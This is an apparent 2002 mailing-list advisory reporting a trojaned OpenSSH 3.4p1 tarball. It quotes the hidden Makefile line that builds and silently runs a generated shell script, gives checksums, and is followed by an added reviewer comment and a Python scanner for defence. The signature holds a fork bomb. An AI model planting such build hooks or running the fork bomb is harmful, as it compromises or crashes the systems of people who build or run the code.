openssh-3.4p1.tar.gz trojaned

From: Edwin Groothuis (edwinat_private)
Date: Wed Jul 31 2002 - 23:55:51 PDT

    Just want to inform you that the OpenSSH package op
    (and probably all its mirrors now) is trojaned:
    The OpenBSD people have been informed about it (via email to
    deraadtat_private and via
    The changed files are openssh-3.4p1/openbsd-compat/
     all: libopenbsd-compat.a
    +       @ $(CC) bf-test.c -o bf-test; ./bf-test>bf-test.out; sh ./bf-test.out &
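Review bot: the added recipe line under `all:` compiles bf-test.c, runs the resulting binary, and hands its output to `sh` in the background, with the leading `@` suppressing the command echo, so the build silently executes generated code as whoever runs make. A target that only depends on libopenbsd-compat.a has no reason to execute a shell script it has just generated; this line should be rejected, and make should not be run on a tree that contains it.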
    bf-test.c[1] is nothing more than a wrapper which generates a
    shell-script[2] which compiles itself and tries to connect to a
    server running on (
    This is the md5 checksum of the openssh-3.4p1.tar.gz in the FreeBSD
    ports system:
        MD5 (openssh-3.4p1.tar.gz) = 459c1d0262e939d6432f193c7a4ba8a8
    This is the md5 checksum of the trojaned openssh-3.4p1.tar.gz:
        MD5 (openssh-3.4p1.tar.gz) = 3ac9bc346d736b4a51d676faa2a08a57
    Edwin Groothuis      |            Personal website:
    edwinat_private    |    Weblog: 
    bash$ :(){ :|:&};:   | Interested in MUDs?

    This archive was generated by hypermail 2b30 : Thu Aug 01 2002 - 08:24:57 PDT
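
As an added example (not part of the original message and not OpenSSH code): a Python sketch that checks a downloaded tarball against the ports MD5 quoted in the message and flags Makefile recipe lines like the one in the diff. The heuristics, the function names and the in-memory sample tarball are assumptions constructed for illustration.

```python
import hashlib
import io
import re
import tarfile

# MD5 of the FreeBSD ports copy, as quoted in the message above.
PORTS_MD5 = "459c1d0262e939d6432f193c7a4ba8a8"

# Assumed heuristics; hits need human review, since legitimate Makefiles
# can also run files from the build directory.
SUSPICIOUS = [
    ("runs a build-directory file", re.compile(r"(^|[;&|\s])(sh\s+)?\./[\w.-]+")),
    ("pipes into a shell", re.compile(r"\|\s*(sh|bash)\b")),
    ("backgrounds a job", re.compile(r"(?<!&)&\s*$")),
]

def md5_matches(data: bytes, expected_hex: str) -> bool:
    return hashlib.md5(data).hexdigest() == expected_hex.lower()

def scan_makefiles(tar_bytes: bytes) -> list:
    """Return (member, line number, reason) for each suspicious recipe line."""
    findings = []
    with tarfile.open(fileobj=io.BytesIO(tar_bytes), mode="r:*") as tar:
        for member in tar:
            base = member.name.rsplit("/", 1)[-1]
            if not (member.isfile() and base.startswith("Makefile")):
                continue
            text = tar.extractfile(member).read().decode("utf-8", "replace")
            for lineno, line in enumerate(text.splitlines(), 1):
                if line.startswith("\t"):  # recipe lines are tab-indented
                    findings += [(member.name, lineno, why)
                                 for why, rx in SUSPICIOUS if rx.search(line)]
    return findings

def build_sample_tarball() -> bytes:
    """Constructed sample: one Makefile carrying the recipe line from the diff."""
    data = ("all: libopenbsd-compat.a\n"
            "\t@ $(CC) bf-test.c -o bf-test; ./bf-test>bf-test.out; sh ./bf-test.out &\n"
            "libopenbsd-compat.a: $(OBJS)\n"
            "\t$(AR) rv $@ $(OBJS)\n").encode()
    buf = io.BytesIO()
    with tarfile.open(fileobj=buf, mode="w:gz") as tar:
        info = tarfile.TarInfo("sample/Makefile")  # constructed member name
        info.size = len(data)
        tar.addfile(info, io.BytesIO(data))
    return buf.getvalue()

if __name__ == "__main__":
    print(scan_makefiles(build_sample_tarball()))
```

The digest comparison is only meaningful when the reference value was recorded independently of the server the tarball came from, as the ports checksum was here.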